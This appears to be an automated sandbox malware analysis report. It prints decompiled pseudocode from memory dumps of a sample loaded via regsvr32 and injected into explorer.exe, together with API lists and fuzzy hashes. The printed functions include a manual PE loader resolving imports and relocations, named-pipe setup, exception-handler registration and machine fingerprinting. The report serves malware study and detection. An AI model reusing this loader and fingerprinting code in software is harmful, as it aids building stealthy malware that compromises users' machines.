                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleModulelstrcpyn
                            • String ID:
                            • API String ID: 3430401031-0
                            • Opcode ID: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                            • Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
                            • Opcode Fuzzy Hash: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                            • Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 52%
                            			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                            				signed int _v5;
                            				signed short _v12;
                            				intOrPtr* _v16;
                            				signed int* _v20;
                            				intOrPtr _v24;
                            				unsigned int _v28;
                            				signed short* _v32;
                            				struct HINSTANCE__* _v36;
                            				intOrPtr* _v40;
                            				signed short* _v44;
                            				intOrPtr _v48;
                            				unsigned int _v52;
                            				intOrPtr _v56;
                            				_Unknown_base(*)()* _v60;
                            				signed int _v64;
                            				intOrPtr _v68;
                            				intOrPtr _v72;
                            				unsigned int _v76;
                            				intOrPtr _v80;
                            				signed int _v84;
                            				intOrPtr _v88;
                            				signed int _t149;
                            				void* _t189;
                            				signed int _t194;
                            				signed int _t196;
                            				intOrPtr _t236;
                            
                            				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                            				_v24 = _v72;
                            				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                            				_v56 = _t236;
                            				if(_t236 == 0) {
                            					L13:
                            					while(0 != 0) {
                            					}
                            					_push(8);
                            					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                            						L35:
                            						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                            						while(0 != 0) {
                            						}
                            						if(_a12 != 0) {
                            							 *_a12 = _v68;
                            						}
                            						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                            						return _v68(_a4, 1, _a8);
                            					}
                            					_v84 = 0x80000000;
                            					_t149 = 8;
                            					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                            					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                            						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                            						if(_v36 == 0) {
                            							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                            						}
                            						if(_v36 != 0) {
                            							if( *_v16 == 0) {
                            								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                            							} else {
                            								_v20 =  *_v16 + _a4;
                            							}
                            							_v64 = _v64 & 0x00000000;
                            							while( *_v20 != 0) {
                            								if(( *_v20 & _v84) == 0) {
                            									_v88 =  *_v20 + _a4;
                            									_v60 = GetProcAddress(_v36, _v88 + 2);
                            								} else {
                            									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                            								}
                            								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                            									 *_v20 = _v60;
                            								} else {
                            									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                            								}
                            								_v20 =  &(_v20[1]);
                            								_v64 = _v64 + 4;
                            							}
                            							_v16 = _v16 + 0x14;
                            							continue;
                            						} else {
                            							_t189 = 0xfffffffd;
                            							return _t189;
                            						}
                            					}
                            					goto L35;
                            				}
                            				_t194 = 8;
                            				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                            				_t196 = 8;
                            				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                            				while(0 != 0) {
                            				}
                            				while(_v48 > 0) {
                            					_v28 = _v44[2];
                            					_v48 = _v48 - _v28;
                            					_v28 = _v28 - 8;
                            					_v28 = _v28 >> 1;
                            					_v32 =  &(_v44[4]);
                            					_v80 = _a4 +  *_v44;
                            					_v52 = _v28;
                            					while(1) {
                            						_v76 = _v52;
                            						_v52 = _v52 - 1;
                            						if(_v76 == 0) {
                            							break;
                            						}
                            						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                            						_v12 =  *_v32 & 0xfff;
                            						_v40 = (_v12 & 0x0000ffff) + _v80;
                            						if((_v5 & 0x000000ff) != 3) {
                            							if((_v5 & 0x000000ff) == 0xa) {
                            								 *_v40 =  *_v40 + _v56;
                            							}
                            						} else {
                            							 *_v40 =  *_v40 + _v56;
                            						}
                            						_v32 =  &(_v32[1]);
                            					}
                            					_v44 = _v32;
                            				}
                            				goto L13;
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(?), ref: 10012C4C
                            • LoadLibraryA.KERNEL32(?), ref: 10012C65
                            • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
                            • GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 384173800-0
                            • Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                            • Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
                            • Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                            • Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
                            				char _v16;
                            				intOrPtr _v20;
                            				char _v24;
                            				char _v28;
                            				void* _t13;
                            				intOrPtr _t15;
                            				signed int _t16;
                            				intOrPtr _t17;
                            				signed int _t18;
                            				char _t20;
                            				intOrPtr _t22;
                            				void* _t23;
                            				void* _t24;
                            				intOrPtr _t29;
                            				intOrPtr _t35;
                            				intOrPtr _t41;
                            				intOrPtr _t43;
                            				intOrPtr _t48;
                            				void* _t51;
                            				signed int _t61;
                            				signed int _t64;
                            				void* _t71;
                            
                            				_t71 = __fp0;
                            				_t61 = __ecx;
                            				_t41 =  *0x1001e6dc; // 0x0
                            				_t13 = E1000A4BF(_t41, 0);
                            				while(_t13 < 0) {
                            					E1000980C( &_v28);
                            					_t43 =  *0x1001e6e0; // 0x0
                            					_t15 =  *0x1001e6e4; // 0x0
                            					_t41 = _t43 + 0xe10;
                            					asm("adc eax, ebx");
                            					__eflags = _t15 - _v24;
                            					if(__eflags > 0) {
                            						L9:
                            						_t16 = 0xfffffffe;
                            						L13:
                            						return _t16;
                            					}
                            					if(__eflags < 0) {
                            						L4:
                            						_t17 =  *0x1001e684; // 0x2e0faa0
                            						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
                            						__eflags = _t18;
                            						if(_t18 == 0) {
                            							break;
                            						}
                            						_t35 =  *0x1001e684; // 0x2e0faa0
                            						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                            						_t41 =  *0x1001e6dc; // 0x0
                            						__eflags = 0;
                            						_t13 = E1000A4BF(_t41, 0);
                            						continue;
                            					}
                            					__eflags = _t41 - _v28;
                            					if(_t41 >= _v28) {
                            						goto L9;
                            					}
                            					goto L4;
                            				}
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_t20 =  *0x1001e6e8; // 0x0
                            				_v28 = _t20;
                            				_t22 = E1000A6A9(_t41, _t61,  &_v16);
                            				_v20 = _t22;
                            				if(_t22 != 0) {
                            					_t23 = GetCurrentProcess();
                            					_t24 = GetCurrentThread();
                            					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
                            					E1000980C(0x1001e6e0);
                            					_t64 = E10001A1B( &_v28, E10001226, _t71);
                            					__eflags = _t64;
                            					if(_t64 >= 0) {
                            						_push(0);
                            						_push( *0x1001e760);
                            						_t51 = 0x27;
                            						E10009F06(_t51);
                            					}
                            				} else {
                            					_t64 = _t61 | 0xffffffff;
                            				}
                            				_t29 =  *0x1001e684; // 0x2e0faa0
                            				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
                            				_t48 =  *0x1001e6dc; // 0x0
                            				 *0x1001e6d0 = 0;
                            				E1000A4DB(_t48);
                            				E1000861A( &_v24, 0);
                            				_t16 = _t64;
                            				goto L13;
                            			}

                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                            • Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
                            • Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                            • Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E10001B2D(void* __eflags, void* __fp0) {
                            				char _v24;
                            				char _v28;
                            				void* _t12;
                            				intOrPtr _t14;
                            				void* _t15;
                            				intOrPtr _t16;
                            				void* _t17;
                            				void* _t19;
                            				void* _t20;
                            				char _t24;
                            				intOrPtr _t26;
                            				intOrPtr _t28;
                            				intOrPtr _t33;
                            				intOrPtr _t38;
                            				intOrPtr _t40;
                            				void* _t41;
                            				intOrPtr _t46;
                            				void* _t48;
                            				intOrPtr _t51;
                            				void* _t61;
                            				void* _t71;
                            
                            				_t71 = __fp0;
                            				_t38 =  *0x1001e6f4; // 0x0
                            				_t12 = E1000A4BF(_t38, 0);
                            				while(_t12 < 0) {
                            					E1000980C( &_v28);
                            					_t40 =  *0x1001e700; // 0x0
                            					_t14 =  *0x1001e704; // 0x0
                            					_t41 = _t40 + 0x3840;
                            					asm("adc eax, ebx");
                            					__eflags = _t14 - _v24;
                            					if(__eflags > 0) {
                            						L13:
                            						_t15 = 0;
                            					} else {
                            						if(__eflags < 0) {
                            							L4:
                            							_t16 =  *0x1001e684; // 0x2e0faa0
                            							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
                            							__eflags = _t17;
                            							if(_t17 == 0) {
                            								break;
                            							} else {
                            								_t33 =  *0x1001e684; // 0x2e0faa0
                            								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                            								_t51 =  *0x1001e6f4; // 0x0
                            								__eflags = 0;
                            								_t12 = E1000A4BF(_t51, 0);
                            								continue;
                            							}
                            						} else {
                            							__eflags = _t41 - _v28;
                            							if(_t41 >= _v28) {
                            								goto L13;
                            							} else {
                            								goto L4;
                            							}
                            						}
                            					}
                            					L12:
                            					return _t15;
                            				}
                            				E1000980C(0x1001e700);
                            				_t19 = GetCurrentProcess();
                            				_t20 = GetCurrentThread();
                            				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_t24 =  *0x1001e6e8; // 0x0
                            				_v28 = _t24;
                            				_t61 = E10001A1B( &_v28, E1000131E, _t71);
                            				if(_t61 >= 0) {
                            					_push(0);
                            					_push( *0x1001e760);
                            					_t48 = 0x27;
                            					E10009F06(_t48);
                            				}
                            				if(_v24 != 0) {
                            					E10006890( &_v24);
                            				}
                            				_t26 =  *0x1001e684; // 0x2e0faa0
                            				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
                            				_t28 =  *0x1001e758; // 0x0
                            				 *0x1001e6ec = 0;
                            				_t29 =  !=  ? 1 : _t28;
                            				_t46 =  *0x1001e6f4; // 0x0
                            				 *0x1001e758 =  !=  ? 1 : _t28;
                            				E1000A4DB(_t46);
                            				_t15 = _t61;
                            				goto L12;
                            			}

                            APIs
                            • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
                            • GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
                            • GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
                            • DuplicateHandle.KERNEL32 ref: 10001BD9
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Current$Process$DuplicateHandleThread
                            • String ID:
                            • API String ID: 3566409357-0
                            • Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                            • Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
                            • Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                            • Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            C-Code - Quality: 79%
                            			E000831C2(void* __edx, void* __eflags) {
                            				CHAR* _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				void* _v20;
                            				signed int _t10;
                            				intOrPtr _t11;
                            				intOrPtr _t12;
                            				void* _t16;
                            				intOrPtr _t18;
                            				intOrPtr _t22;
                            				intOrPtr _t28;
                            				void* _t38;
                            				CHAR* _t40;
                            
                            				_t38 = __edx;
                            				_t28 =  *0x9e688; // 0xb0000
                            				_t10 = E0008C292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
                            				_t40 = _t10;
                            				_v8 = _t40;
                            				if(_t40 != 0) {
                            					_t11 = E00088604(0x80000); // executed
                            					 *0x9e724 = _t11;
                            					__eflags = _t11;
                            					if(_t11 != 0) {
                            						_t12 = E0008BD10(); // executed
                            						_v16 = _t12;
                            						__eflags = _t12;
                            						if(_t12 != 0) {
                            							_push(0xc);
                            							_pop(0);
                            							_v12 = 1;
                            						}
                            						_v20 = 0;
                            						__eflags = 0;
                            						asm("sbb eax, eax");
                            						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
                            						 *0x9e674 = _t16;
                            						__eflags = _t16 - 0xffffffff;
                            						if(_t16 != 0xffffffff) {
                            							E0008BC7A( &_v20, _t38); // executed
                            							_t18 = E000898EE(E000832A1, 0, __eflags, 0, 0); // executed
                            							__eflags = _t18;
                            							if(_t18 != 0) {
                            								goto L12;
                            							}
                            							_t22 =  *0x9e684; // 0x286f8f0
                            							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
                            							_push(0xfffffffd);
                            							goto L11;
                            						} else {
                            							 *0x9e674 = 0;
                            							_push(0xfffffffe);
                            							L11:
                            							_pop(0);
                            							L12:
                            							E0008861A( &_v8, 0xffffffff);
                            							return 0;
                            						}
                            					}
                            					_push(0xfffffff5);
                            					goto L11;
                            				}
                            				return _t10 | 0xffffffff;
                            			}

                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6bab0573e060300c16f750c3d2d8a24a33e2e11bb09ca3b5967ac9be5f3208f7
                            • Instruction ID: 8572b94192bc1e43ddf863f0276067eeaee28e73aa111561e36aea24d5a940c8
                            • Opcode Fuzzy Hash: 6bab0573e060300c16f750c3d2d8a24a33e2e11bb09ca3b5967ac9be5f3208f7
                            • Instruction Fuzzy Hash: 6821C872604211AAEB10FBB9EC45FAE77A8FB95B74F20032AF165D71D1EE3489008751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00085A61(void* __eflags) {
                            				intOrPtr _t2;
                            				void* _t6;
                            				void* _t7;
                            
                            				_t2 =  *0x9e684; // 0x286f8f0
                            				 *((intOrPtr*)(_t2 + 0x108))(1, E00085A06);
                            				E00085631(_t6, _t7); // executed
                            				return 0;
                            			}

                            APIs
                            • RtlAddVectoredExceptionHandler.NTDLL(00000001,00085A06,00085CE8), ref: 00085A6D
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionHandlerVectored
                            • String ID:
                            • API String ID: 3310709589-0
                            • Opcode ID: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                            • Instruction ID: 435aaf7462d5f916828f25a0b113b0bfc22426b62e8c3a1df64e723560edf676
                            • Opcode Fuzzy Hash: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                            • Instruction Fuzzy Hash: 2FB092312509409BD640FB60CC8AEC83290BB20782F4100A072858A0A3DAE048906702
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 79%
                            			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                            				char _v516;
                            				void _v1044;
                            				char _v1076;
                            				signed int _v1080;
                            				signed int _v1096;
                            				WCHAR* _v1100;
                            				intOrPtr _v1104;
                            				signed int _v1108;
                            				intOrPtr _v1112;
                            				intOrPtr _v1116;
                            				char _v1144;
                            				char _v1148;
                            				void* __esi;
                            				intOrPtr _t66;
                            				intOrPtr _t73;
                            				signed int _t75;
                            				intOrPtr _t76;
                            				signed int _t80;
                            				signed int _t81;
                            				WCHAR* _t87;
                            				void* _t89;
                            				signed int _t90;
                            				signed int _t91;
                            				signed int _t93;
                            				signed int _t94;
                            				WCHAR* _t96;
                            				intOrPtr _t106;
                            				intOrPtr _t107;
                            				void* _t108;
                            				intOrPtr _t109;
                            				signed char _t116;
                            				WCHAR* _t118;
                            				void* _t122;
                            				signed int _t123;
                            				intOrPtr _t125;
                            				void* _t128;
                            				void* _t129;
                            				WCHAR* _t130;
                            				void* _t134;
                            				void* _t141;
                            				void* _t143;
                            				WCHAR* _t145;
                            				signed int _t153;
                            				void* _t154;
                            				void* _t178;
                            				signed int _t180;
                            				void* _t181;
                            				void* _t183;
                            				void* _t187;
                            				signed int _t188;
                            				WCHAR* _t190;
                            				signed int _t191;
                            				signed int _t192;
                            				intOrPtr* _t194;
                            				signed int _t196;
                            				void* _t199;
                            				void* _t200;
                            				void* _t201;
                            				void* _t202;
                            				intOrPtr* _t203;
                            				void* _t208;
                            
                            				_t208 = __fp0;
                            				_push(_t191);
                            				_t128 = __edx;
                            				_t187 = __ecx;
                            				_t192 = _t191 | 0xffffffff;
                            				memset( &_v1044, 0, 0x20c);
                            				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                            				_v1108 = 1;
                            				if(_t187 != 0) {
                            					_t123 =  *0x9e688; // 0xb0000
                            					_t125 =  *0x9e68c; // 0x286fab8
                            					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                            				}
                            				if(E0008BB8D(_t187) != 0) {
                            					L4:
                            					_t134 = _t128; // executed
                            					_t66 = E0008B7A8(_t134,  &_v516); // executed
                            					_push(_t134);
                            					_v1104 = _t66;
                            					E0008B67D(_t66,  &_v1076, _t206, _t208);
                            					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
                            					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
                            					E0008B88A(_t141,  &_v1100, _t208);
                            					_t175 =  &_v1076;
                            					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208); // executed
                            					_v1112 = _t73;
                            					_t143 = _t141;
                            					if(_t73 != 0) {
                            						_push(0);
                            						_push(_t129);
                            						_push("\\");
                            						_t130 = E000892E5(_t73);
                            						_t200 = _t199 + 0x10;
                            						_t75 =  *0x9e688; // 0xb0000
                            						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                            						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                            							L12:
                            							__eflags = _v1108;
                            							if(__eflags != 0) {
                            								_t76 = E000891E3(_v1112);
                            								_t145 = _t130;
                            								 *0x9e740 = _t76;
                            								 *0x9e738 = E000891E3(_t145);
                            								L17:
                            								_push(_t145);
                            								_t80 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
                            								_t188 = _t80;
                            								_t201 = _t200 + 0x10;
                            								__eflags = _t188;
                            								if(_t188 == 0) {
                            									goto L41;
                            								}
                            								_push(0x9b9ca);
                            								E00089F48(0xe); // executed
                            								E00089F6C(_t188, _t208, _t130); // executed
                            								_t194 = _a4;
                            								_v1096 = _v1096 & 0x00000000;
                            								_push(2);
                            								_v1100 =  *_t194;
                            								_push(8);
                            								_push( &_v1100);
                            								_t178 = 0xb; // executed
                            								E0008A0AB(_t188, _t178, _t208); // executed
                            								_t179 =  *(_t194 + 0x10);
                            								_t202 = _t201 + 0xc;
                            								__eflags =  *(_t194 + 0x10);
                            								if( *(_t194 + 0x10) != 0) {
                            									E0008A3ED(_t188, _t179, _t208);
                            								}
                            								_t180 =  *(_t194 + 0xc);
                            								__eflags = _t180;
                            								if(_t180 != 0) {
                            									E0008A3ED(_t188, _t180, _t208); // executed
                            								}
                            								_t87 = E0008980C(0);
                            								_push(2);
                            								_v1100 = _t87;
                            								_t153 = _t188;
                            								_push(8);
                            								_v1096 = _t180;
                            								_push( &_v1100);
                            								_t181 = 2; // executed
                            								_t89 = E0008A0AB(_t153, _t181, _t208); // executed
                            								_t203 = _t202 + 0xc;
                            								__eflags = _v1108;
                            								if(_v1108 == 0) {
                            									_t153 =  *0x9e688; // 0xb0000
                            									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                            									if(__eflags != 0) {
                            										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
                            										_t203 = _t203 + 0xc;
                            										goto L26;
                            									}
                            									_t153 = _t153 + 0x228;
                            									goto L25;
                            								} else {
                            									_t91 =  *0x9e688; // 0xb0000
                            									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                            									if(__eflags != 0) {
                            										L32:
                            										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                            										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                            											_t183 = 0x64;
                            											E0008E23E(_t183);
                            										}
                            										E000852C0( &_v1076, _t208);
                            										_t190 = _a8;
                            										_t154 = _t153;
                            										__eflags = _t190;
                            										if(_t190 != 0) {
                            											_t94 =  *0x9e688; // 0xb0000
                            											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                            											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                            												lstrcpyW(_t190, _t130);
                            											} else {
                            												_t96 = E0008109A(_t154, 0x228);
                            												_v1100 = _t96;
                            												lstrcpyW(_t190, _t96);
                            												E000885D5( &_v1100);
                            												 *_t203 = "\"";
                            												lstrcatW(_t190, ??);
                            												lstrcatW(_t190, _t130);
                            												lstrcatW(_t190, "\"");
                            											}
                            										}
                            										_t93 = _a12;
                            										__eflags = _t93;
                            										if(_t93 != 0) {
                            											 *_t93 = _v1104;
                            										}
                            										_t192 = 0;
                            										__eflags = 0;
                            										goto L41;
                            									}
                            									_t51 = _t91 + 0x228; // 0xb0228
                            									_t153 = _t51;
                            									L25:
                            									_t90 = E0008553F(_t153, _t130, __eflags);
                            									L26:
                            									__eflags = _t90;
                            									if(_t90 >= 0) {
                            										_t91 =  *0x9e688; // 0xb0000
                            										goto L32;
                            									}
                            									_push(0xfffffffd);
                            									L6:
                            									_pop(_t192);
                            									goto L41;
                            								}
                            							}
                            							_t106 = E0008C292(_v1104, __eflags);
                            							_v1112 = _t106;
                            							_t107 =  *0x9e684; // 0x286f8f0
                            							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                            							__eflags = _t108 - _t192;
                            							if(_t108 != _t192) {
                            								_t109 =  *0x9e684; // 0x286f8f0
                            								 *((intOrPtr*)(_t109 + 0x30))();
                            								E0008861A( &_v1148, _t192);
                            								_t145 = _t108;
                            								goto L17;
                            							}
                            							E0008861A( &_v1144, _t192);
                            							_t81 = 1;
                            							goto L42;
                            						}
                            						_t116 =  *(_t75 + 0x1898);
                            						__eflags = _t116 & 0x00000004;
                            						if((_t116 & 0x00000004) == 0) {
                            							__eflags = _t116;
                            							if(_t116 != 0) {
                            								goto L12;
                            							}
                            							L11:
                            							E0008E286(_v1112, _t175);
                            							goto L12;
                            						}
                            						_v1080 = _v1080 & 0x00000000;
                            						_t118 = E000895E1(_t143, 0x879);
                            						_v1100 = _t118;
                            						_t175 = _t118;
                            						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                            						E000885D5( &_v1100);
                            						_t200 = _t200 + 0x14;
                            						goto L11;
                            					}
                            					_push(0xfffffffe);
                            					goto L6;
                            				} else {
                            					_t122 = E00082BA4( &_v1044, _t192, 0x105); // executed
                            					_t206 = _t122;
                            					if(_t122 == 0) {
                            						L41:
                            						_t81 = _t192;
                            						L42:
                            						return _t81;
                            					}
                            					goto L4;
                            				}
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset
                            • String ID:
                            • API String ID: 1985475764-0
                            • Opcode ID: 9bc29f469b0c4d889638083fe99749512850c4321a7bd1bc72b38965809efcf2
                            • Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
                            • Opcode Fuzzy Hash: 9bc29f469b0c4d889638083fe99749512850c4321a7bd1bc72b38965809efcf2
                            • Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 94%
                            			E0008B7A8(WCHAR* __ecx, void* __edx) {
                            				long _v8;
                            				long _v12;
                            				WCHAR* _v16;
                            				short _v528;
                            				short _v1040;
                            				short _v1552;
                            				WCHAR* _t27;
                            				signed int _t29;
                            				void* _t33;
                            				long _t38;
                            				WCHAR* _t43;
                            				WCHAR* _t56;
                            
                            				_t44 = __ecx;
                            				_v8 = _v8 & 0x00000000;
                            				_t43 = __edx;
                            				_t56 = __ecx;
                            				memset(__edx, 0, 0x100);
                            				_v12 = 0x100;
                            				GetComputerNameW( &_v528,  &_v12);
                            				lstrcpynW(_t43,  &_v528, 0x100);
                            				_t27 = E000895E1(_t44, 0xa88);
                            				_v16 = _t27;
                            				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                            				asm("sbb eax, eax");
                            				_v8 = _v8 &  ~_t29;
                            				E000885D5( &_v16);
                            				_t33 = E0008C392(_t43);
                            				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
                            				lstrcatW(_t43, _t56);
                            				_t38 = E0008C392(_t43);
                            				_v12 = _t38;
                            				CharUpperBuffW(_t43, _t38);
                            				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
                            			}

                            APIs
                            • memset.MSVCRT ref: 0008B7C5
                            • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B7E0
                            • lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
                            • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B821
                              • Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D
                            • lstrcatW.KERNEL32 ref: 0008B85A
                            • CharUpperBuffW.USER32(?,00000000), ref: 0008B86C
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                            • String ID:
                            • API String ID: 3410906232-0
